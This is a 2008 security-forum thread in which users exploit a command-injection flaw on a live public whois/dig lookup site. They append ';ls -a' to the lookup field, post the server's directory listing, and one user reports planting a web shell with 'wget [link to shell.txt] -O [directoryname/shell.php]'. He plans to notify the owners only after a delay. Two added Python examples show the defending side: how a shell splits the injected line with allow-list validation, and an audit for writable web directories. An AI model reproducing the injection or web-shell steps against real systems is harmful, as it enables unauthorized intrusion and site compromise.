Waraxe IT Security Portal
Hmm question

Posted: Sat Jun 07, 2008 3:05 am
Chedda
Active user
Joined: May 26, 2008
Posts: 27

So I was browsing around looking for a good place for a wannabe hacker. I came across this, but wasn't given any information on how it's performed. I have been looking elsewhere to find more information on this exploit and I think I found something, but not even sure if it's correct. "whois.net is running a shell command, you can end one and start another. You'd do that by adding a semicolon to the Dig arguments."

So I tried such commands as website.com;ls -a and it actually works, but not like the below. Can anyone fill in the gaps?


Quote:

You Are Searching For ***censored due to it being a spoiler*** /etc/passwd:

Last edited by Chedda on Sun Jun 08, 2008 12:39 am; edited 1 time in total
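
The explanation quoted in the post above, seen from the defending side: an added example, not code from this thread or from the affected site. It assumes the lookup page builds its command as "dig " plus the form value; all function names are illustrative. The first half shows how a shell splits that line into two commands, the second half allow-lists the value as a host name and runs dig from an argument list with no shell involved.

```python
import re
import shlex
import subprocess

def unsafe_command(user_input: str) -> str:
    """Assumed vulnerable pattern: form value pasted into a shell command line."""
    return "dig " + user_input

def commands_seen_by_shell(command_line: str) -> list[list[str]]:
    """Simplified view of how a POSIX shell splits a line at ; | & operators."""
    lexer = shlex.shlex(command_line, posix=True, punctuation_chars=True)
    commands, current = [], []
    for token in lexer:
        if token and set(token) <= set(";|&"):
            if current:
                commands.append(current)
            current = []
        else:
            current.append(token)
    if current:
        commands.append(current)
    return commands

# One DNS label: letters, digits, hyphens, no leading or trailing hyphen, max 63.
_LABEL = r"[A-Za-z0-9](?:[A-Za-z0-9-]{0,61}[A-Za-z0-9])?"
_HOSTNAME = re.compile(rf"{_LABEL}(?:\.{_LABEL})*\.?")

def safe_argv(user_input: str) -> list[str]:
    """Allow-list the value as a host name, then build an argv list (no shell)."""
    name = user_input.strip()
    if len(name) > 253 or not _HOSTNAME.fullmatch(name):
        raise ValueError("rejected: not a plain host name")
    return ["dig", name]

def run_dig(user_input: str) -> str:
    """Run dig without a shell, so metacharacters are never interpreted."""
    result = subprocess.run(safe_argv(user_input), capture_output=True,
                            text=True, timeout=10, check=False)
    return result.stdout

if __name__ == "__main__":
    print(commands_seen_by_shell(unsafe_command("website.com;ls -a")))
    for value in ("website.com", "website.com;ls -a", "-f", "@127.0.0.1"):
        try:
            print(value, "->", safe_argv(value))
        except ValueError as err:
            print(value, "->", err)
```

The host name pattern also rejects values starting with "-", "+" or "@", which dig would otherwise read as options, query flags or a server address.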

Posted: Sat Jun 07, 2008 7:16 am
gibbocool
Advanced user
Joined: Jan 22, 2008
Posts: 208

Interesting, good find. You could now use wget and upload shell.
How did you find this vulnerability?


and btw, No links to vulnerable sites.

_________________
http://www.gibbocool.com

Posted: Sat Jun 07, 2008 4:41 pm
Chedda
Active user
Joined: May 26, 2008
Posts: 27

I was merely googling random things about hacking in general and came across it on a forum. I didn't really find anything; someone else did all the work. The forum is dead though and the post is a couple of months old. They never said what they did to accomplish this, so I was wondering if you knew what command they used?


Code:
website.com;ls -a
only returns

Quote:
You Are Searching For ****.com;ls -a:

; <<>> DiG 9.2.3 <<>> ****.com
;; global options: printcmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 60077
;; flags: qr rd ra; QUERY: 1, ANSWER: 1, AUTHORITY: 2, ADDITIONAL: 0

;; QUESTION SECTION:
;****.com. IN A

;; ANSWER SECTION:
****.com. 43200 IN A 65.162.***.***

;; AUTHORITY SECTION:
****.com. 43200 IN NS ns2.address.com.
****.com. 43200 IN NS ns1.address.com.

;; Query time: 104 msec
;; SERVER: 127.0.0.1#53(127.0.0.1)
;; WHEN: Sat Jun 7 16:39:40 2008
;; MSG SIZE rcvd: 85

.
..
.htaccess
Application.php
Browsersize.URL
admin
back.jpg
circuit.dtd
circuit.xml
dspHelloWorld.php
dspTesting.php
dsp_about.php
fusebox.dtd
fusebox.init.php
fusebox.xml
fusebox4.loader.php4.php
fusebox4.parser.php4.php
fusebox4.runtime.php4.php
fusebox4.transformer.php4.php
includes
index.php
index_old.html
ipaddress
layFooter.php
layHeader.php
layouts
left.jpg
lib
manual
parsed
ping
plugins
protolize
right.jpg
seo
tools
udf_canonicalpath.php
udf_relativefilepath.php
validator
websites
websitetools.css
whois
whois.net

Posted: Sat Jun 07, 2008 6:08 pm
pexli
Valuable expert
Joined: May 24, 2007
Posts: 665
Location: Bulgaria

Try website.com;pwd

Posted: Sun Jun 08, 2008 12:15 am
gibbocool
Advanced user
Joined: Jan 22, 2008
Posts: 208

I successfully uploaded a shell. Too easy.

When you've had your fun I'll email them about the vulnerability. All it takes is one malicious hacker to destroy that site, and seriously who would want to be malicious against a site like that.

_________________
http://www.gibbocool.com

Posted: Sun Jun 08, 2008 12:33 am
Chedda
Active user
Joined: May 26, 2008
Posts: 27

gibbocool wrote:
I successfully uploaded a shell. Too easy.

When you've had your fun I'll email them about the vulnerability. All it takes is one malicious hacker to destroy that site, and seriously who would want to be malicious against a site like that.


Hehe, glad to see someone got some use out of it. As far as I am concerned you can email them; I will never figure out how to use it, sadly.

Posted: Sun Jun 08, 2008 4:50 am
gibbocool
Advanced user
Joined: Jan 22, 2008
Posts: 208

Quite simple, it's just a matter of knowing Unix commands. If you don't know them, I advise you to install Linux such as Ubuntu and have a play.

All I did here was
1. find a directory with write permissions
2. use wget [link to shell.txt] -O [directoryname/shell.php]
3. go to url of shell.php

I'll wait a couple days then email them.

_________________
http://www.gibbocool.com
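
The steps in the post above depend on the web server account being able to write into a directory from which PHP is served. The audit below is an added example for checking a document root for that condition, not code from this thread; it assumes the web server is not the owner of the files, so group or world write bits are what matter, and the sample tree and directory names are constructed.

```python
import os
import stat
import tempfile
from pathlib import Path

# Assumption: extensions the web server hands to the PHP interpreter.
SCRIPT_SUFFIXES = {".php", ".php4", ".phtml"}

def audit_docroot(docroot: str) -> list[dict]:
    """Report directories under docroot that are group- or world-writable,
    together with any script files already sitting in them."""
    findings = []
    for dirpath, _dirnames, filenames in os.walk(docroot):
        mode = stat.S_IMODE(os.stat(dirpath).st_mode)
        if not mode & (stat.S_IWGRP | stat.S_IWOTH):
            continue  # only the owner can write here
        scripts = sorted(name for name in filenames
                         if Path(name).suffix.lower() in SCRIPT_SUFFIXES)
        findings.append({"dir": os.path.relpath(dirpath, docroot),
                         "mode": oct(mode), "scripts": scripts})
    return sorted(findings, key=lambda item: item["dir"])

def build_sample_tree() -> str:
    """Constructed sample document root: one locked-down directory, one
    world-writable directory that already holds a dropped script."""
    root = tempfile.mkdtemp(prefix="docroot-")
    for name, mode, files in (("lib", 0o755, ["index.php"]),
                              ("uploads", 0o777, ["photo.jpg", "shell.php"])):
        path = os.path.join(root, name)
        os.mkdir(path)
        for filename in files:
            Path(path, filename).write_text("placeholder\n")
        os.chmod(path, mode)
    os.chmod(root, 0o755)
    return root

if __name__ == "__main__":
    for finding in audit_docroot(build_sample_tree()):
        print(finding)
```

Each reported directory should either lose its write bits or have script execution disabled for it in the web server configuration.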

Posted: Sun Jun 08, 2008 5:00 am
Chedda
Active user
Joined: May 26, 2008
Posts: 27

gibbocool wrote:
Quite simple, it's just a matter of knowing Unix commands. If you don't know them, I advise you to install Linux such as Ubuntu and have a play.

All I did here was
1. find a directory with write permissions
2. use wget [link to shell.txt] -O [directoryname/shell.php]
3. go to url of shell.php

I'll wait a couple days then email them.


Why can't I even be as cool as you, Gibbocool? You make everything so simple, love it!

Posted: Wed Jun 11, 2008 5:40 pm
Kazuma
Beginner
Joined: May 17, 2008
Posts: 3
Location: Zwollywood

No success for me on multiple websites. It just returns a list of my local machine Laughing
All logos and trademarks in this site are property of their respective owner. The comments and posts are property of their posters, all the rest (c) 2004-2024 Janek Vind "waraxe"